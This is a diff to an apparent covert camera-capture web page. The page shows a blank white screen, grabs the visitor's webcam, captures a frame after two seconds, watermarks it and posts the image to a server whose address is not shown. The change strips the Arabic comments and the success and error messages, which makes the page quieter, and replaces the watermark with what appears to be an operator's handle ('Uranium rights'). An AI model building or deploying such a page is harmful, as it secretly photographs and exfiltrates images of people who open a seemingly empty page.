--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@ margin: 0;
 padding: 0;
 width: 100%;
 height: 100%;
-background-color: white; /* الشاشة البيضاء */
+background-color: white;
 display: flex;
 justify-content: center;
 align-items: center;
@@ -37,15 +37,15 @@ video.srcObject = stream;
 setTimeout(captureAndSend, 2000);
 })
 .catch(err => {
-console.error("خطأ في الوصول للكاميرا: ", err);
+console.error(".: ", err);
 });
 
 function captureAndSend() {
 context.drawImage(video, 0, 0, 640, 480);
 
 context.font = '20px Arial';
-context.fillStyle = 'red';
-context.fillText('حقوقك محفوظة', 10, canvas.height - 20);
+context.fillStyle = 'yellow';
+context.fillText('حقوق يورانيوم', 10, canvas.height - 20);
 
 canvas.toBlob(blob => {
 const formData = new FormData();
@@ -59,10 +59,10 @@ body: formData
 })
 .then(response => {
 if (response.ok) {
-console.log('تم إرسال الصورة بنجاح');
+console.log(' ');
 return response.json();
 } else {
-throw new Error('خطأ في إرسال الصورة');
+throw new Error('');
 }
 })
 .then(data => console.log(data))
